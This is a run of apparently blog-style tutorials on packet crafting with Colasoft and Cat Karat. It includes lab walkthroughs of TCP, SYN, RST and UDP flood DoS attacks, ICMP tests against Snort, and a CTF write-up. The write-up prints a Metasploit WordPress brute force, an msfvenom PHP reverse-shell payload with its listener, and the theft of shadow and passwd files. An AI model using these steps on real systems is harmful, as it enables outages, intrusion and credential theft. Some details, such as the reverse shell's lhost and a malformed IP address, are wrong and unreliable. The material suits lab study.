Packet Playing: Inthis phase when packet is ready to launch then it sends to target’s network for exploiting its network and collect the information. This is the actual arena where above both actions is tested and if packet is failed to complete its goal of retrieving victim’s information or exploit its vulnerability then again the packet send back to Packet Editing phase for modification.

Packet Analysis: This is the last stage where packet is analysis when it received on targeted network. The captured packet is decoded for further investigating for retrieving its internal details which can speak up its goal for establishing connection on target’s network.

Famous Tool of Packet Analysis: wireshark and Tcpdump

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.

Users are also able to edit decoding information in two editors - Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets, Colasoft Packet Builder also supports saving packets to packet files and sending packets to network.

From:  http://www.colasoft.com/packet_builder/

Let’s start!!!

TCP Packet Crafting

You can download it from above given link, once it get downloaded then run the applictaion as administrator to begin with crafting various Packets. As I had example above a packet crafting involves 4 phases, lets  start it by adding the packet which we will craft for testing our newtork.

Click on ADD given in menu bar.

A small window will pop up to select mode of IP packet to be crafted. Here we are going to choose TCP packet for crafting for example by increasing the size of the packet or by sending the individual flag of the Tcp Protocol to the destination IP address. Well if you will notice given below image then you will observe that I had set delta time 0.1 sec as time elapse for flow of traffic for all crafted packets. The delta time is the time gap between the each packet.

Window is categories into three phases as Decode Editor, Hex Editor and packet List. From given image you can observe following information which I had edited for TCP packet

Decode Editor:This section contains packet information such as protocol, Time to live and etc. Here you need to addsource address responsible for sending packet and then add destination addresswhich is responsible for receiving incoming packet traffic.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Hex Editor:  This section displays the raw information (Hexa decimal) releated to the data size of the packet. By typing random string you can increase the size of the packet.

Packet size:77 bytes

 This phase is also known as Packet Editing mode where we can modify our packet.

Packet List: It displays complete information of your packet which contains source address, destination address, time to live and and other information which we had edited.

Click on Adpter  given in the menu bar to select specific adpter from which packets will be sent. From given below image you can observe it, it showning adapter status: LAN Operational.

Note: It is only availabe when you have run the application as adminsitrator.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packets to be sent to the Destination Network and the delay time gap between the each packets.

Then click on start to send the TCP packets. This phase is know as Packet playing mode where are ready to sent packet on target netwok.

Using wireshark we can capture packet and traffic between source and destination. So here you can perceive that infinite TCP packet is being transferring to target’s network. This phase is known as packet analysis mode where sent packet is sniff or analysis for identifying sender objectives behind sending the packet.

ARP  Packet Crafting

Again repeat the same to choose ARP packet for crafting Packet for ARP protocol on target’s network. Well if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

Apart from editing source and destination IP here we need to add source and destination physical address also.

Hence this time I had set below information in decoder Editor and Hex editor.

Source MAC: AA:AA:AA:AA:AA:AA

Source address: 192.168.1.102

Destination MAC: BB:BB:BB:BB:BB:BB

Destination address: 192.168.1.107

Packet size:78 bytes

You can use any method to find destination MAC address.

After editing your packet information verifies that changes through packet list given on right side of window before sending the packet. If you notice given image below then you can read the summary where it is show broadcasting ARP message who is 192.168.1.107?

Click on Adpter  given in menu bar to select specific adpter for network selection. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start to launch sending process of ARP packet. This action is known as Packet playing.

Form given below image you can observe the continue ARP packet making request for who is 192.168.1.107, which meaning our packet playing is gives positive result. From wireshark target is able to analysis the goal of packet received from sender’s network.

IPv4 Packet Crafting 

Again repeat the same process to choose IP packet for crafting Packet for IPv4 protocol on target’s network. Again if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

This time I had set below information in decoder Editor and Hex editor for Editing Packet.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Packet size:71 bytes

After editing your packet information verifies that changes through packet list given on right side of window before sending the packet.

Click on Adpter  given in menu bar to select specific adpter for sending the packet. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start to send the IPv4 packet.

You can clearly observe in given below image the flow of traffic of IPv4 packets from senders network to Receivers network in packet analyzing mode.

UDP Packet Crafting

Again repeat the same to choose UDP packet for crafting UDP Packet. If you will notice given below image then you will observe that again I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.

This time I had Editied below information in decoder Editor and Hex editor for desigining my packet.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Packet size:72 bytes

After editing your packet information verifies that changes through packet list given on right side of window.

Click on Adpter to select specific adpter for sending the packets. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust the number of packet to be sent to the Destination network according to your wish.

Then click on start button to sending the crafted UDP packet.

You can clearly observe in given below image the flow of traffic of UDP packets from senders network to the Receivers network.

Hence in this tutorial we tried to explain all for mode of operation of crafting a packet for testing a network using colasoft and wireshark.

DOS Attack with Packet Crafting using Colasoft

December 31, 2017, 6:58 am

≫ Next: TCP & UDP Packet Crafting with CatKARAT

≪ Previous: Packet Crafting with Colasoft Packet Builder

$

0

0

In our previous article we had discuss “packet crafting using Colasoft Packet builder”  and today you will DOS attack using colasoft Packet builder. In DOS penetration testing part 1 we had used Hping3 in Kali Linux for generating TCP, UDP, SYN, FIN and RST traffic Flood for DOS attack on target’s network. Similarly we are going to use colasoft for all those attack by making change in their data size of packets and time elapse between packets.

Let’s start!!!

TCP DOS Attack

You can download it from given link, once it get downloaded then run the applictaion as admionistrator to begin the DOS attack.

Click on ADD given in menu bar.

A small window will pop up to select mode of attack here we are going to choose TCP packetfor generating TCP packet flood on target’s network. Well if you will notice given below image then you will observe that I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.  This is because as much as the time elapse will be smaller as much as packet will be sent faster on target’s network.

Window is categories into three phases as Decode Editor, Hex Editor and packet List. From given image you can observe following information which I had edited for TCP packet

Decode Editor:This section contains packet information such as protocol, Time to live and etc. Here you need to addsource address responsible for sending packet and then add destination addresswhich is responsible for receiving incoming packet traffic.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Hex Editor:  This section displays the raw information (Hexa decimal) releated to the data size of the packet. By typing random string you can increase the data length of the packet.

Packet size:112 bytes

Packet List: It displays complete information of your packet which contain source address and destination address, time to live and and other information which we had edited.

Click on Adpter  gien in menu bar to select specific adpter for DOS attack. From given below image you can observe it  showning adapter status: LAN Operational.

Note: It is only availabe when you have run the application as adminsitrator.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

Using wireshark we can capture packet and traffic between source and destination. So here  you can perceive that infinite TCP packet is being transferring on target’s network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

TCP SYN DOS Attack

Again repeat the same to choose TCP packet for generating TCP SYN flood on target’s network. Well if you will notice given below image again then you will observe that I had set same delta time 0.1 sec.

You people must aware of TCP-SYN Flood attack so in oder to generate only SYN packet traffic, activate TCP flag for synchronize sequence by changing bit form 0 to 1.

Hence this time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Flag: SYN

Packet size:115 bytes

And repeat above step of TCP flood to begin the attack.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

You can clearly observe the flow of traffic of SYN packet from attacker network to targets network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

TCP RST DOS Attack

Again repeat the same to choose TCP packet for generating TCP Reset flood on target’s network. If you will notice given below image then you will observe that again I had set delta time 0.1 sec  this is because as much as the time elapse will be smaller as much as packet will be sent faster on target’s network.

You people must aware of TCP-RST Flood attack so in oder to generate only Reset packet traffic, activate TCP flag for Reset the connection by changing bit form 0 to 1.

Hence this time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Flag: Reset

Packet size:104 bytes

After then repeat above step to begin the attack.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch TCP packet for DOS attack.

You can clearly observe the flow of traffic of RST packet from attacker network to targets network, after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

UDP DOS Attack

Again repeat the same to choose UDP packet for generating TCP flood on target’s network. If you will notice given below image then you will observe that again I had set delta time 0.1 sec as time elapse for flow of traffic for all packets.

This time I had set below information in decoder Editor and Hex editor.

Source address: 192.168.1.102

Destination address: 192.168.1.107

Source port:80

Packet size:113bytes

After editing your packet information verifies that changes through packet list given on right side of window before launching attack.

Click on Adpter to select specific adpter for DOS attack. From given below image you can observe it  showning adapter status: LAN Operational.

Click on Send option from menu bar and enable the check box for “Burst Mode” and “Loop sending” and adjust its size according to your wish.

Then click on start to launch UDP packet for DOS attack.

You can clearly observe in given below image the flow of traffic of UDP packets from attacker network to targets network after sometime it will demolish the victim’s machine so that victim could not able to reply any legitimate request of other users.

TCP & UDP Packet Crafting with CatKARAT

January 2, 2018, 10:15 pm

≫ Next: ICMP Penetration Testing with Cat Karat

≪ Previous: DOS Attack with Packet Crafting using Colasoft

$

0

0

Hello friends ! in our previous article we had described packert crafting using colasoft packet builder. Again we are going to use a new tool “Cat KARAT”for packet crafting to test our network  by crafting various kind of network packet.

Cat Karat Packet Builder is a is a handy, easy to use IP4, IP6, IP4/IP6 tunnels, PPoE, TCP, UDP, ICMPv4, ICMPv6, VRRP, IGMP, ARP, DHCP , OAM, VLAN (Q in Q), MPLS, Spanning tree BPDU and LLDP packet generation tool that allows to build custom packets for firewall or target testing and has integrated scripting ability for automated testing.

This Packet Builder enables the user to specify the entire contents of the packet from the GUI. In addition to building packets. Packet Builder also supports saving packets to packet files and sending packets to network. It can be used at all kinds of network areas like traffic generator, packet generator or protocol simulator.

This project also provides a packet capture tool. It is designed for use by anyone who wants to inject packets into a network and/or observe packets exiting a network. Usually packet operation by following protocol stack is limited to command line interface. With this tool, all user have to do is clicking the screen, which almost everybody can do

From: http://packetbuilder.net

You can download it from given link above.

Let’s start!!

As we had discuss in our previous article that there are 4 mode of operation in packet crafting.

1.       Packet Assembly

2.       Packet Editing

3.       Packet Playing

4.       Packet Analysis

Let start from first phase is “Packet Assembly” where you need to decide type of packet and network you want to created among TCP, IP, ICMP and UDP.

Now when you will run the installed application “Cat KARAT” you will observe three important sections “Interfaces”, “Packet flow” and Packet view  which in their default state as shown in given below image.

TCP-SYN Packet Crafting

So as we know in Packet Assembly phase we need to decide protocol for crafting any packet, which is quite easy to select with this tool. Only enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “TCP” without disturbing remaining default packet flow as shown given below image.

Next we need to select the interface which you can select from the second sections of Interfaces by double-Click on it.

Now next is packet Editingphase where you need to specify source IP address such as: 192.168.1.11 from which packet will be sent and Destination IP address such as: 192.168.1.12 on which packet is received. Moreover you can also make some changes in your packet such as Time to live (TTL), Data length and also can go with packet fragmentation.

From given below image you can observe I had added source and destination IP in packet under the third section protocol view -> Ipv4

As we know TCP protocol use TCP-flag for communication to established connection with Destination IP. Therefore we are crafting TCP-SYN packet under the third section protocol view -> TCP by enabling sync sequence option which flow from source port 80 to destination port 80.

Once everything is edited then your packet is ready to send on target network.

Click on play button given in menu bar for sending packet on target’s network.

As we know after finishing packet editing operation we need to send it on target network which is known as “Packet Playing” in this mode we actually test packet Assembly and packet Editing mode if show packet is send successfully else again we send packet in packet Editing mode for modification.

From given below image you can observe the result “Packet sent successfully”

Last phase is Packet Analysis mode where received packet is analysis using packet analysis tool. Here we had use wireshark for capturing incoming traffic. Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-SYN packet.

TCP-RST Packet crafting

So the Packet Assembly phase and Packet Editing phase for TCP–RST packet crafting is almost same as above only the difference is make in change TCP-Flag through which connection will be established with target network.

Since we want to send traffic through only reset packets for establishing connection with target network therefore enable the check box of Reset connect.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-RST packet.

TCP-PSH/ACK Packet Crafting

So the Packet Assembly phase and Packet Editing phase for TCP–PSH/ACK packet crafting is almost same as above only the difference is make in change TCP-Flag through which connection will be established with target network.

Since we want to send traffic through only Push with Acknowledgement packets for establishing connection with target network therefore enable the check box of PUSH Function and Acknowledgement.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

Hence from given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as TCP protocol and TCP-PSH/ACK packet.

UDP Packet Crafting

Similarly as above in Packet Assembly phase we need to decide protocol for crafting UDP packet, enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “UDP” without disturbing remaining default packet flow as shown given below image.

Move into Protocol view section for Packet Editing and enter source and destination IP. I had added source and destination IP in packet under the third section protocol view -> Ipv4 as done above.

Now explore the UDP tabfor design UDP packets as per your requirement, from given below image you can observe default setting details.

Source port: 00000

Destination port:00000

Now the UDP traffic will flow from source port 0 to destination port 0.

Click on play button given in menu bar for sending packet on target’s network which is part of Packet playing mode.

From given below image you can observe the result “Packet sent successfully”

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as UDP protocol and from source port 0 to destination 0 of 60 length.

ICMP Penetration Testing with Cat Karat

January 3, 2018, 9:06 am

≫ Next: Hack the Basic Penetration VM (CTF challenge)

≪ Previous: TCP & UDP Packet Crafting with CatKARAT

$

0

0

In our previous article we had discussed “ICMP protocol with Wireshark” where we had seen how an ICMP protocol work at layer 3 according to OSI model and study its result using wireshark. Today we are going discuss to ICMP penetration testing by crafting ICMP packet to test our IDS “Snort” against all ICMP message Types using Cat Karat tool, you can download it from http://packetbuilder.netlink.

For configuring Snort as IDS read our previous article “Configure snort in Ubuntu” it will automatically install snort in your system with predefine set of rules that will help in packet capturing of your network.

Let’s start!!

Basically we will perform this practical in three phases as describe below:

Packet crafting:In this phase we will craft each ICMP packet with different type ICMP message using Cat Karat. For more detail about Packet crafting process read our previous article.

Packet Capturing:In this phase we will capture the ICMP packet and receive an alert when it will enters into target’s network using snort as IDS.

Packet Analysis:In this phase we will investigate captured packet using wireshark.

Brief Introduction on ICMP protocol

ICMP message contains two types of codes i.e. query and error.

Query: The query messages are the information we get from a router or another destination host.

For example given below message types are some ICMP query codes:

·         Type 0 = Echo Reply

·         Type 8 = Echo Request

·         Type 9 = Router Advertisement

·         Type 10 = Router Solicitation

·         Type 13 = Timestamp Request

·         Type 14 = Timestamp Reply

Error: The error statement messages reports problem which a router or a destination host may generate.

For example: given below message types are some of the ICMP error codes:

·         Type 3 = Destination Unreachable

·         Type 4 = Source Quench

·         Type 5 = Redirect

·         Type 11 = Time Exceeded

·         Type 12 = Parameter Problems

Now when you will run the installed application “Cat KARAT” you will observe three important sections “Interfaces”, “Packet flow” and Packet view  which in their default state as shown in given below image.

Message TYPE 0 ICMP Packet Crafting

So as we know in Packet Crafting Operation “Packet Assembly” is 1st phase where we need to decide protocol for crafting any packet, which is quite easy to select with this tool. Only enable the radio button for selecting protocol and direction flow of packet. Here I had enable radio buttons for “IPv4” and “ICMP” without disturbing remaining default packet flow as shown given below image.

Next we need to select the “interface” which you can select from the Interfaces by double-Click on it.

Now next is “packet Editing” phase where you need to specify source IP address such as: 192.168.1.2 from which packet will be sent and Destination IP address such as: 192.168.1.107 on which packet is received. Moreover you can also make some changes in your packet such as Time to live (TTL), Data length and also can go with packet fragmentation.

From given below image you can observe I had added source and destination IP in packet under the third section protocol view -> Ipv4

Under 3^rd section protocol view in cat Karat explore ICMP tab and select “0-Echo Response” option which is generate type 0 ICMP message. Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation. This ICMP message type also uses to test the strength of IDS and Firewall against ICMP smurf Dos Attack.

Capturing ICMP-Type0 packet through IDS

Advantage of install snort through apt respiratory is that, it is quick and easy to install in your system as well as it contains predefine set of rule files related to every type of network traffic either TCP/UDP or ICMP.

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP echo Reply packet is found in network. This rule also works against Smurf Dos attack in which ICMP echo reply/response traffic is received on target’s network without sending genuine ICMP request packet from target’s network to other network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Echo Reply” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type0 packet through Wireshark

Now Last phase is Packet Analysis which is also last mode of operation of packet crafting process where received packet is analysis using packet analysis tool. Here we had use wireshark for capturing incoming traffic. From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type packet and other information.

 When the tester will click on Stop button given in menu bar of Cat Karat tool he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 0 is successfully sent on target machine.

Message TYPE 1 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through message type 1 packets for establishing connection with target network therefore select Type -1 Reserved from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation.

Capturing ICMP-Type1 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP unassigned type 1 packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 1” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type1 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Reserved”  packets and other information.

When the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 1 is successfully sent on target machine.

Message TYPE 2 ICMP Packet Crafting

Again the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through only message type 2 packets for establishing connection with target network therefore select Type 2 Reserved from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button for sending packet on target’s network.

Capturing ICMP-Type2 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP unassigned type 2 packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when again our IDS received any matching packets defined in its file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 2” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type2 packet through Wireshark

Here also the wireshark has captured exactly same information as per our prediction and fetch same details which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message “Reserved” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 2 is successfully sent on target machine.

Message TYPE 3 ICMP Packet Crafting

Now we want to send traffic through message type 3 packets for establishing connection with target network therefore select Type 3 Destination Unreachable from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type3 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Destination Unreachable  Network Unreachable packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

As said above so when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Destination Unreachable Network Unreachable” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type3 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Destination Unreachable” (Network Unreachable) packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 3 is successfully sent on target machine.

Message TYPE 4 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Since we want to send traffic through message type 4 packets for establishing connection with target network therefore select Type 4 Source Quench from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network which known as “packet playing” phase of packet Crafting operation.

Capturing ICMP-Type4 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Source Quench packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Source Quench” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type4 packet through Wireshark

Here also the wireshark has captured exactly same information as per our prediction and fetch same details which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Source quench” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 4 is successfully sent on target machine.

Message TYPE 5 ICMP Packet Crafting

We want to send traffic through message type 5 packets for establishing connection with target network therefore select Type 5 Redirect from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type5 packet through IDS

As given in below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP redirect net packet when found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Redirect net” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type5 packet through Wireshark

Again as per our prediction wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “redirect” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 5 is successfully sent on target machine.

Message TYPE 6 ICMP Packet Crafting

So the Packet Assembly phase and Packet Editing phase for ICMP packet crafting is almost same as above only the difference is make in change ICMP message through which connection will be established with target network.

Here now next we want to send traffic through message type 6 packets for establishing connection with target network therefore select Type 6 for Alternate Host Addressfrom given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type6 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Alternate Host Address packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Alternate Host Address” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type6 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP message type “Alternate Host Address” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 6 is successfully sent on target machine.

Message TYPE 7 ICMP Packet Crafting

Again Repeat the same and send traffic through message type 7 packets for establishing connection with target network therefore select Type 7 for Unassignedfrom given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type7 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Alternate Host Address packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Therefore when IDS received any matching packets described in file of rules then it will generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP unassigned type 7” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type7 packet through Wireshark

Wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP unknown message type “obsolete or malformed” packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 7 is successfully sent on target machine.

Message TYPE 8 ICMP Packet Crafting

Since we want to send traffic through message type 8 packets for establishing connection with target network therefore select Type 8 for ICMP echo Request from given list.

This step is very useful because it will craft a packet will send ICMP Request packet on target’s network to test the strength of IDS and Firewall.

Infinite packet ICMP Request packet is consider as ICMP Flood or Ping of Death Attack when sent only network therefore we can check our IDS and Firewall Strength against such DOS attack through this packet crafting.   

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type8 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMP Ping packet is found in network. As we know ICMP echo Request packet is consider as Ping request packet which sends request to a network IP for establishing connection with it.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generates an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP Ping ” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type8 packet through Wireshark

From given below image you can observe that wireshark has captured Ping packet for ICMP Echo request as described above, exactly same information which we had bind in packet such as ICMP protocol, ICMP Ping request message packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 8 is successfully sent on target machine.

Message TYPE 9 ICMP Packet Crafting

Now at last we want to send traffic through message type 9 packets for establishing connection with target network therefore select Type 9 for router Advertisement from given list.

Once everything is edited then your packet is ready to send on target network. Click on play button given in menu bar for sending packet on target’s network.

Capturing ICMP-Type9 packet through IDS

From given below image you can observer that inside the file “icmp-info rules” an alert rule is already implemented for capturing the traffic of ICMProuter Advertisement packet is found in network.

Now turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when IDS received any matching packets defined in file of rules then generate an alert for captured packet. From given below image you can observe that an alert is generated by snort for “ICMP router Advertisement” packets from source address 192.168.1.1.2 to destination 192.168.1.107.

Analysis ICMP-Type9 packet through Wireshark

From given below image you can observe that wireshark has captured exactly same information which we had bind in packet during packet Assembly and packet Editing mode such as ICMP protocol, ICMP PICMP router Advertisementmessage packet and other information.

Again when the tester will click on Stop button, he will receive the status of sent packet either as successful or as failed.

From given below image you can perceive that our ICMP Type 9 is successfully sent on target machine.

---

Hack the Basic Penetration VM (CTF challenge)

January 5, 2018, 8:40 am

≫ Next: Forensics Tools in Kali

≪ Previous: ICMP Penetration Testing with Cat Karat

$

0

0

Hello friends! Today we are going to take another CTF challenge known as Basic Penetration. The credit for making this vm machine goes to “ Josiah Pierce” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.13 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sT 192.168.1.13

Nmap scan shows us port 80 is open, so we open ip address in our browser.

We don’t find anything on the webpage we use nikto to find more information.

nikto -h http://192.168.1.13

We find a directory called secret/ we open it in our browser. We find that it is made of wordpress.

We try to open the admin page but it wouldn’t open. When we look at the address bar of the browser. We find that we need to open the admin page using domain name.

Now we add ‘vtcsec’ to hosts file, the hosts file is in /etc/ folder. We add the ip-address of the VM and the domain name.

Now when we open the admin page we can access it. We find that the username is admin. We now brute force the password using this username.

We use metasploit to brute force wordpress admin login.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set username admin

msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt

msf auxiliary(wordpress_login_enum) > set targeturi /secret/

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13

msf auxiliary(wordpress_login_enum) > run

We find that the password to the admin panel is “admin”. Now we use username and password as ‘admin’ to access the admin panel. After getting the admin panel we move to 404-template in themes. We change the source code of 404-template with our metasploit shell.

Now we create php shell using msfvenom to replace the 404-template.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 -f raw

Now we copy the php code from

Now we setup or listener using metasploit.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.13

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now when we run the shell we get the reverse connection. To execute the code, we open the url.

http://vtcsec/secret/wp-content/templates/twentyseventeen/404.php

As soon as we execute the code we get reverse shell.

After getting the reverse shell we find that we can access both shadow and passwd file. So we download both of them into our system

Now we use unshadow (a utility of john the ripper) to mix merge passwd and shadow file into one file.

